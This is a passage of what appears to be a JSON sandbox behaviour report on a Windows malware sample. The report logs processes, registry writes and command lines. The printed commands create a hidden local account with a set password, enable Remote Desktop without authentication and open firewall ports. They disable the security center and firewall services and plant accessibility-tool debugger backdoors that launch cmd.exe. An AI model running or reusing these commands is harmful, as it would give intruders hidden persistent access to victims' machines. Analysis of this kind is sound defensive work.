],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\ImagePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.EN",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.ENU",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en-US"
]
},
"first_seen": 1574704388.499876,
"ppid": 1432
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3936,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\AllowTSConnections",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\AllowTSConnections"
]
},
"first_seen": 1574704390.812374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3652,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\RPLifeInterval",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\RPLifeInterval"
]
},
"first_seen": 1574704393.984249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3144,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\MaxIdleTime"
]
},
"first_seen": 1574704391.593626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 1616,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\debugger"
]
},
"first_seen": 1574704387.890499,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3172,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704400.577999,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\cacls.exe",
"process_name": "cacls.exe",
"pid": 3424,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\cacls.exe.mui",
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"directory_enumerated": [
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type"
],
"dll_loaded": [
"API-MS-Win-Security-LSALookup-L1-1-0.dll",
"kernel32.dll",
"rpcrt4.dll"
]
},
"first_seen": 1574704389.327999,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 2148,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\ontar"
]
},
"first_seen": 1574704393.796751,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 4212,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
]
},
"first_seen": 1574704406.187374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\takeown.exe",
"process_name": "takeown.exe",
"pid": 3192,
"summary": {
"file_opened": [
"C:\\Windows\\System32\\sethc.exe",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LDAP",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\LSA\\AccessProviders"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\AccessProviders\\MartaExtension",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity"
],
"dll_loaded": [
"kernel32.dll",
"ntmarta.dll"
],
"file_failed": [
"C:\\Windows\\System32\\sethc.exe"
]
},
"first_seen": 1574704388.765501,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3348,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 accounts \/forcelogoff:no"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704392.671751,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 1044,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\StartTimeLo",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\StartTimeLo"
]
},
"first_seen": 1574704404.656124,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3204,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\debugger"
]
},
"first_seen": 1574704392.343626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 1096,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\\debugger"
]
},
"first_seen": 1574704387.718626,
"ppid": 2988
},
{
"process_path": "C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"process_name": "RDPWInst.exe",
"pid": 4252,
"summary": {
"file_failed": [
"C:\\Windows\\System32\\rdpwrap.ini"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService",
"HKEY_LOCAL_MACHINE\\Software\\CodeGear\\Locales",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters",
"HKEY_CURRENT_USER\\Software\\CodeGear\\Locales",
"HKEY_CURRENT_USER\\Software\\Borland\\Locales",
"HKEY_CURRENT_USER\\Software\\Borland\\Delphi\\Locales"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\ImagePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.EN",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.ENU",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.en-US"
],
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui"
]
},
"first_seen": 1574704406.218626,
"ppid": 1432
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 2728,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 start tlntsvr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704400.999876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\cmd.exe",
"process_name": "cmd.exe",
"pid": 2588,
"summary": {
"directory_created": [
"C:\\Documents and settings\\ontar"
],
"dll_loaded": [
"ADVAPI32.dll",
"kernel32.dll"
],
"file_opened": [
"",
"\\Device\\NamedPipe\\",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"file_deleted": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"file_exists": [
"C:\\Windows\\System32\\cmd.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\n",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat\""
],
"file_failed": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"command_line": [
"sc stop wscsvc",
"net start tlntsvr",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\" \/v \"StartTimeLo\" \/t REG_DWORD \/d \"2386147405\" \/f",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"fDenyTSConnections\" \/t REG_DWORD \/d 0x0 \/f",
"net start rasman",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v helpassistant \/t REG_DWORD \/d \"00000000\" \/f",
"net user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\"",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxConnectionTime\" \/t REG_DWORD \/d 0x1 \/f",
"Reg.exe add \"HKLM\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"net localgroup \"Remote Desktop Users\" ontar \/add",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxDisconnectionTime\" \/t REG_DWORD \/d 0x0 \/f",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v ontar \/t REG_DWORD \/d \"00000000\" \/f",
"sc stop SharedAccess",
"sc config wscsvc start= disabled",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"Reg.exe add \"HKU\\S-1-5-21-1252767878-4065156067-3399968500-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\" \/v \"P:\\FUNER\\Iveghny\\Ertfubg.rkr\" \/t REG_BINARY \/d \"1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000\" \/f",
"netsh firewall add portopening TCP 4899 system",
"net start remoteaccess",
"sc config remoteaccess start= auto",
"C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value | Find \"=\"",
"net accounts \/forcelogoff:no \/maxpwage:unlimited",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxIdleTime\" \/t REG_DWORD \/d 0x0 \/f",
"Reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \/v SFCDisable \/t REG_DWORD \/d \"FFFFFF9D\" \/f",
"net accounts \/forcelogoff:no",
"attrib +h +s \"C:\\Documents and settings\\ontar\" \/S \/D",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" \/v RPLifeInterval \/t REG_DWORD \/d \"00005180\" \/f",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\" \/v \"LastPolicyTime\" \/t REG_DWORD \/d \"19856934\" \/f",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"AllowTSConnections\" \/t REG_DWORD \/d 0x1 \/f",
"sc config SharedAccess start= disabled",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v UserAuthentication \/t REG_DWORD \/d 0x00000000 \/f",
"C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value | Find \"=\"",
"netsh firewall add portopening TCP 3389 system",
"Reg.exe add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" \/v \"UserAuthentication\" \/t REG_DWORD \/d \"0\" \/f",
"sc config tlntsvr start= auto",
"net accounts \/maxpwage:unlimited",
